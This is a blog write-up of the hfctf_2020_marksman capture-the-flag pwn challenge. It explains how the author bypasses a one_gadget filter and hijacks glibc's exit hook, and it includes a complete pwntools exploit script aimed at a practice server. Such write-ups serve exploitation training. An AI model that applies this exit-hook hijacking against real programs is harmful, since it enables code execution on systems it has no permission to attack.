zoukankan      html  css  js  c++  java

  • Adjust one_gadget and hijack exit_hook:hfctf_2020_marksman

    Mastered new knowledge points through this topic:hijack exit_hook.

    Analyze

    We first drag in ida

    The binary first gave the address of the puts function.
    So we can get the address of the libc and one_gadget easily.
    But there is a check function in the binary. All one_gadget found through one_gadget are invalid.

    signed __int64 __fastcall check(_BYTE *target)
{
  if ( (*target != 0xC5u || target[1] != 0xF2u)
    && (*target != 0x22 || target[1] != 0xF3u)
    && *target != 0x8Cu
    && target[1] != 0xA3u )
  {
    return 1LL;
  }
  puts("You always want a Gold Finger!");
  return 0LL;
}


    But through ida, I found that there is a call instruction near a one_gadget. Through experiments, I found that this gadget is valid.
    call close

    So the next thing to do is to hijack a function as that gadget.
    In the binary, we found that the exit function was called in the end of the binary. So we hijack exit_hook.
    exit()->__run_exit_handlers->_dl_fini->__rtld_lock_unlock_recursive
    Modify __rtld_lock_unlock_recursive or __rtld_lock_lock_recursive.
    In gdb:

    exp

    exp:

    from pwn import *

'''
author: lemon
time: 2021-01-17
python version: 3.8.5
'''

local = 0

binary = "hfctf_2020_marksman"
libc_path = '../libc-2.27.so'
port = "29614"

if local == 1:
	p = process(binary)
else:
	p = remote("node3.buuoj.cn",port)

def dbg():
	context.log_level = 'debug'

def leak_libc(addr):
	global libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_
	libc = ELF(libc_path)
	libc_base = addr - libc.sym['puts']
	print("[*] libc base:",hex(libc_base))
	__malloc_hook = libc_base + libc.sym['__malloc_hook']
	system = libc_base + libc.sym['system']
	__free_hook = libc_base + libc.sym['__free_hook']
	_IO_2_1_stdout_ = libc_base + libc.sym['_IO_2_1_stdout_']

context.terminal = ['tmux','splitw','-h']

p.recvuntil('I placed the target near: ')
puts_addr = int(p.recv(14),base = 16)
leak_libc(puts_addr)

exit_hook = libc_base + 0x81df60

og = libc_base + 0x10a38c
check_og = libc_base + 0x10A387

p.recvuntil('shoot!shoot!')
p.sendline(str(exit_hook))
p.recvuntil('biang!')
p.sendline(chr(check_og & 0xff))
p.recvuntil('biang!')
p.sendline(chr(check_og >> 8 & 0xff))
p.recvuntil('biang!')
p.sendline(chr(check_og >> 16 & 0xff))

p.interactive()

    Reference Link :
    https://blog.csdn.net/qq_43116977/article/details/105485947
    http://taqini.space/2020/04/29/about-execve/#栗子
    http://chumen77.xyz/2020/09/28/BUUCTF刷题记录/#hfctf-2020-marksman
  • 相关阅读:
    LeetCode Power of Three
    LeetCode Nim Game
    LeetCode,ugly number
    LeetCode Binary Tree Paths
    LeetCode Word Pattern
    LeetCode Bulls and Cows
    LeeCode Odd Even Linked List
    LeetCode twoSum
    549. Binary Tree Longest Consecutive Sequence II
    113. Path Sum II
  • 原文地址:https://www.cnblogs.com/lemon629/p/14290240.html
Copyright © 2011-2022 走看看